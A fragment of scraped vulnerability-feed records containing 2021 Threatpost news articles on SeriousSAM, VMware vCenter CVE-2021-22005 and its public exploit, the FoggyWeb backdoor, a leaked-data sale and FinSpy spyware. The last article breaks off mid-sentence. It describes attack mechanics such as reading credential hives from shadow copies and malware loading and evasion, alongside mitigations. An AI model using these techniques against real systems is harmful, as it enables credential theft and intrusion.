\n[](<https://threatpost.com/newsletter-sign/>)Simply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be decrypted offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researcher Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. 
So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmin delete the backup copies of the VSS files. The OS maker does not offer a patch for the bug, rather a simple workaround.\n\nMicrosoft explains the two step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a 
[security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Plankers, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. 
The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. 
\u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. 
\u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. \u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the 
need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. 
Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. 
Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. 
The malware also inherits the AD FS service account permissions that are required to access the AD FS configuration database, Nafisi wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. 
They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. 
Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. 
Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. 
\u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. 
\u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond the immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much financial gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. 
_[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. 
This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. 
Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 
21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. 
CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT asset inventory in a dynamic environment is really hard to do. Threat actors figured that out a long time ago and work around the clock to exploit it. The first step to combating threats like this one is to establish a continuously updated, accurate inventory of all enterprise assets to serve as a foundational control for your security program.\u201d\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:44:05", "description": "The FinSpy surveillance kit has been driven from its hiding place following an eight-month investigation by Kaspersky researchers. Detections of the spyware trojan have dwindled since 2018, but it turns out that it hasn\u2019t gone away \u2013 it\u2019s simply been hiding behind various first-stage implants that have helped to cloak its activities. At the same time, it\u2019s continued to advance its capabilities.\n\nFinSpy (aka FinFisher or Wingbird) is a multiplatform software for Windows, macOS and Linux that\u2019s marketed as a tool for law enforcement. However, much like [NSO Group\u2019s Pegasus](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>), it\u2019s often seen [being used for far more malicious purposes](<https://threatpost.com/finspy-modules-secure-messaging-apps/146372/>). First discovered in 2011, it\u2019s a full-service spyware, capable of stealing information and credentials as well as keeping tabs on user activities. 
For instance, it gathers file listings and deleted files, as well as various documents; can livestream or record data via webcam and microphone; can snoop on messaging chats; and it uses the developers\u2019 mode in browsers to intercept traffic protected by HTTPS.\n\nIn the middle of 2019, several suspicious installers for legitimate applications such as TeamViewer, VLC Media Player and WinRAR were found to contain malicious code. However, they didn\u2019t seem connected to any known malware, according to Kaspersky. But one day researchers stumbled across a Burmese-language website that hosted both the trojanized installers as well as samples of FinSpy for Android.\n\n\u201cWe began detecting some suspicious installers of legitimate applications, backdoored with a relatively small, obfuscated downloader,\u201d according to Kaspersky researchers Igor Kuznetsov and Georgy Kucherin, presenting at a retro-themed and virtual Security Analyst Summit (SAS) 2021 on Tuesday. \u201cOver the course of our investigation, we found out that the backdoored installers are nothing more than first-stage implants that are used to download and deploy further payloads before the actual FinSpy trojan.\u201d\n\n## **Multiple Evasion Techniques**\n\nThe new samples are protected with multiple layers of evasion tactics. For one, after a victim downloads and executes a trojanized application, they\u2019re vetted by two components, according to the analysis. The first is a \u201cpre-validator\u201d that runs multiple security checks to ensure that the device it is infecting does not belong to a security researcher.\n\nThe pre-validator downloads a host of security shellcodes from the command-and-control (C2) server and executes them \u2013 33 of them in all. 
Each shellcode collects specific system information (e.g., the current process name) and uploads it back to the server, researchers noted. If any of the checks fail, the C2 server terminates the infection process.\n\nKaspersky researchers Georgy Kucherin and Igor Kuznetsov presenting at the virtual Security Analyst Summit (SAS) 2021.\n\nIf all security checks pass, the server provides a second component, dubbed the \u201cpost-validator.\u201d It collects information that allows it to identify the victim machine and perhaps validate a specific target (it logs running processes, recently opened documents and screenshots) and sends it to a C2 server specified in its configuration.\n\nBased on the information collected, the C2 server decides whether to deploy the full-fledged trojan platform or remove the infection, according to Kaspersky.\n\nIf FinSpy is finally deployed, it arrives heavily obfuscated with four complex, custom-made obfuscators, according to Kaspersky\u2019s analysis.\n\n\u201cThe primary function of this obfuscation is to slow down the analysis of the spyware,\u201d the researchers explained.\n\nAnother evasion tactic involves a sample of FinSpy that infects machines by replacing the Windows UEFI bootloader, which is responsible for launching the operating system.\n\n\u201cThis method of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks,\u201d according to [the research](<https://securelist.com/finspy-unseen-findings/104322/>). \u201cUEFI infections are very rare and generally hard to 